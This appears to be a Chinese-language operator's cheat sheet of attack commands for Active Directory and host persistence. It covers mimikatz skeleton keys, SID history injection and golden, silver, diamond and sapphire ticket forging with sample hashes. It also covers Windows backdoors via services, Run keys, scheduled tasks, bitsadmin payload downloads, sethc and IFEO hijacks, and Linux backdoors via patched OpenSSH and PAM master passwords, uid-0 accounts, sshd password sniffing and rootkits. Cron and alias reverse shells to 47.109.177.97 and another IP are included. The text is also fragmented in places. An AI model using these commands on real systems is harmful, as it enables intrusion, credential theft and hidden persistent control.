privilege::debug
misc::memssp



reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
reg add "HKLM\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ
域控上执行
mimikatz:privilege::debug
misc::skeleton

ipc链接
net use \owa.god.org\ipc$ "mimikatz" /user:god\administrator
dir \owa.god.org\c$

获取域内所有使用的sid
wmic useraccount get sid,name 1000以后普通用户
获取某用户SID属性
Powershell Get-ADUser testuser -Properties sidhistory

域控命令
privilege::debug
sid::patch
sid::add /sam:testuser /new:administrator



dsrm&krbtgt&NTLM hash同步
krbtgt用户的 NTLM hash覆盖administrator用户的NTLM hash运行NTDSUTIL
NTDSUTIL修改DSRM的密码
set DSRM password使DSRM的密码和指定域用户的密码同步
sync from domain account krbtgt
q q 退出设置DSRM可以被所有机器登录
New-ItemProperty "hklm:\system\currentcontrolset\control\lsa" -name "dsrmadminlog
onbehavior" -value 2 -propertyType DWORD获取krbtgt的NTLM hash
privilege::debug
lsadump::lsa /patch /name:krbtgt


条件
1.域名称
2.域的SID值
3.域的krbtgt账户的NTLM-Hash
4.伪造任意用户名
获得想要获得黄金票据的用户sid值
wmic useraccount get name,sid获得krbtgt 的NTLM Hash
mimikatz privilege::debug
lsadump::dcsync /domain:god.org /user:krbtgt制作黄金票据
mimikatz kerberos::golden /user:administrator /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /ticket:goldentgt导入票据
mimikatz kerberos::ptt goldentgt



条件
1.目标机器的hsah
2.域的sid
3.计算机名
获得目标机器的的hash
mimikatz privilege::debug
mimikatz sekurlsa::logonpasswords(0a3778a3bd20ce9e27154c0941b5c65a)获取域sid
whoami /all获取计算机名
hostname制作并注入白银票据
mimikatz kerberos::golden /sid:S-1-5-21-2952760202-1353902439-2381784089 /doamin:god.org /target:计算机名.域名/service:cifs /rc4:0a3778a3bd20ce9e27154c0941b5c65a /user:111 /ptt


条件:
1.krbtgt的ntlmhsah和aes256
2.域控计算机名
3.域账号用户密码
4.域名
Rubeus.exe asktgt /user:administrator /password:159/aes256:a780c2c18b3287e3448562a36dccb2d57d11fd398b55ce2cd9b128308cef74df /domain:god.org /dc:owa.god.org /ptt /nowrap
Rubeus.exe asktgs /ticket: base64的票据/service:cifs/owa /ptt /nowrap



条件:
1.域名
2.普通用户账号密码
3.域sid
4.krbtgt的ntlmhash和aes256
获取krbtgt的ntml和aeskey
lsadump::dcsync /domain:god.org /user:krbtgt
krbtgt:ntlm:58e91a5ac358d86513ab224312314061
aeskey:a780c2c18b3287e3448562a36dccb2d57d11fd398b55ce2cd9b128308cef74df
构造票据
python ticketer.py -request -impersonate 'administrator' -domain 'god.org' -user 'liukaifeng01' -password '159' -aesKey 'a780c2c18b3287e3448562a36dccb2d57d11fd398b55ce2cd9b128308cef74df
' -domain-sid 'S-1-5-21-2952760202-1353902439-2381784089' -nthash '58e91a5ac358d86513ab224312314061' 'test'
载入票据
kerberos::ptc test.ccache



黄金票据:能控制所有服务协议资源,但容易被安全设备捕获(伪造票据)
白银票据:只能控制指定服务协议资源,但不容易被安全设备捕获(伪造票据)
钻石票据:利用条件更多,权限维持更持续,更不容易被安全设备捕获,重启还可以生效(真实票据)
蓝宝石票据:利用条件更多,权限维持更持续,更难被安全设备捕获(真实票据)
详细:https://xz.aliyun.com/news/13032




python exploit.py -t "C:\Users\zyjsuper\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" -o demo.zip --data-file http.exe

C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

sc create backdoor binPath= "C:\Users\daheike\Desktop\http.exe" start= auto DisplayName= "backdoor"
创建名为backdoor的服务,路径 自动开启

-添加启动项
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\Users\daheike\Desktop\http.exe"
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "backdoor" /t REG_SZ /F /D "C:\Users\daheike\Desktop\http.exe"

schtasks /create /tn "backdoor" /tr "C:\Users\daheike\Desktop\http.exe" /sc onstart /ru SYSTEM
创建任务:
bitsadmin /create backdoor
添加下载文件
bitsadmin /addfile backdoor "http://47.109.177.97/msfhttp.exe" "C:\Users\zyjsuper\Desktop\http.exe"
设置下载完成后的执行命令
bitsadmin /SetNotifyCmdLine backdoor C:\Users\zyjsuper\Desktop\http.exe NUL
设置重试策略:
bitsadmin /SetMinRetryDelay "backdoor" 30
启动任务:
bitsadmin /resume backdoor




修改权限
takeown /f C:\Windows\System32\sethc.exe
备份文件
copy sethc.exe sethc1.exe
替换劫持
copy cmd.exe sethc.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\Users\daheike\Desktop\http.exe"

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /V "Userinit" /t REG_SZ /F /D "C:\windows\system32\userinit.exe,C:\Users\daheike\Desktop\http.exe"
还可以配合powershell无文件


reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\Users\daheike\Desktop\http.exe" /f


REG ADD "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\path\to\malicious_script.bat"

Windows rootkit(根套件)是一类恶意软件,旨在隐藏自身或其他恶意进程,以避免被检测和删除。进程隐藏是rootkit常见的功能之一,根套件通过多种技术来实现这一目标







下载地址:https://github.com/bytecode77/r77-rootkit
下载依赖项
dnf -y install openssl openssl-devel pam-devel zlib zlib-devel
yum -y install gcc gcc-c++ make
上传两个安装包
wget http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gztar -xzvf 0x06-openssh-5.9p1.patch.tar.gz
wget https://mirror.aarnet.edu.au/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
tar -xzvf openssh-5.9p1.tar.gz
cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1
cdcd openssh-5.9p1 && patch < sshbd5.9p1.diff
添加万能密码
vim includes.h
ILOG是别人用ssh登录该主机记录的日志目录(有明文密码)
OLOG是该主机用ssh登录其他主机记录的日志目录(有明文密码)
SECRETPW 就是万能密码

更换版本( OpenSSH_8.7p1, OpenSSL 3.5.1 1 Jul 2025)
vim version.h
OpenSSH_8.7p1, OpenSSL 3.2.2 4 Jun 2024

编译
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 && make && make install

重启服务

详细:https://mp.weixin.qq.com/s/BNrJHUs9qxEVHNSFEghaRw
systemctl restart sshd.service
设置安全等级
setenforce 0查询rpm版本
rpm -qa | grep pam

下载对用版本的pam
wget http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz
解压
tar -xvf Linux-PAM-1.1.8.tar.xz
下载编译环境
yum install gcc flex flex-devel -y修改配置文件写入后门密码
vim Linux-PAM-1.1.8/modules/pam_unix/pam_unix_auth.c

编译
cd Linux-PAM-1.5.1
./configure && make
覆盖
cd /root/Linux-PAM-1.1.8/modules/pam_unix/.libs
cp pam_unix.so /usr/lib64/security/pam_unix.so

下载连接:https://mirrors.aliyun.com/blfs/conglomeration/Linux-PAM/
查看是否使用PAM进行身份验证
cat /etc/ssh/sshd_config|grep UsePAM

创建软连接并且在启动一个ssh登录的端口
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=6666可能会有防火墙拦截
firewall-cmd --add-port=6666/tcp --permanent
firewall-cmd --reload
firewall-cmd --query-port=6666/tcp(yes)

服务器开启使用公私钥登录方式
条件
cat /etc/ssh/sshd_config
RSAAuthentication yes
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
生成密钥对
ssh-keygen -t rsa(一直回车就行)
上传公钥到~/.ssh/authorized_keys
权限
chmod 600 /root/.ssh/authorized_keys
chmod 700 ~/root/.ssh
连接
ssh -i 私钥 [email protected]
useradd -p
openssl passwd -1 -salt 'salt' 密码用户名 -o -u 0 -g root -G root -s /bin/bash -d /home/用户名
直接修改/etc/passwd文件
echo "用户名:x:0:0::/:/bin/bash" >> /etc/passwd
passwd 用户名
文件
vim /etc/crontab
*/1 * * * * root 文件路径
命令
vim /var/spool/cron/root
*/1 * * * * bash -i >& /dev/tcp/47.109.177.97/9999 0>&1 2>&1

sshd 明文
(strace -f -F -pps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}-t -e trace=read,write -s 32 2> /tmp/.sshd.log &)
查看文件
grep -E 'read(6, ".+\0\0\0\.+"' /tmp/.sshd.log

添加
alias 123="ls -l"

都执行但是会卡住
alias ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/192.168.225.130/4444 0>&1;};alerts'

文件 重启之后不会消失
Vim /root/.bashrcalias ls='alerts(){ ls $* --color=auto;python3 -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'''UTF-8''')}sys.version_info[0]))";};alerts'


安装
yum -y install perl vim gcc make g++ unzip
yum -y localinstall kernel-devel-"$kernal".rpm
chmod +x setup.sh
./setup.sh install
隐藏关键词
密码
密码
隐藏关键词
666
y
ip
端口
1
隐藏进程号
/reptile/reptile_cmd hide 4774(pid)

隐藏/展示端口
/reptile/reptile_cmd tcp ip:88 hide


文件当中带有reptile的都会隐藏
github:hkl1x
weixin:wxid_gyhkcfxipu5w22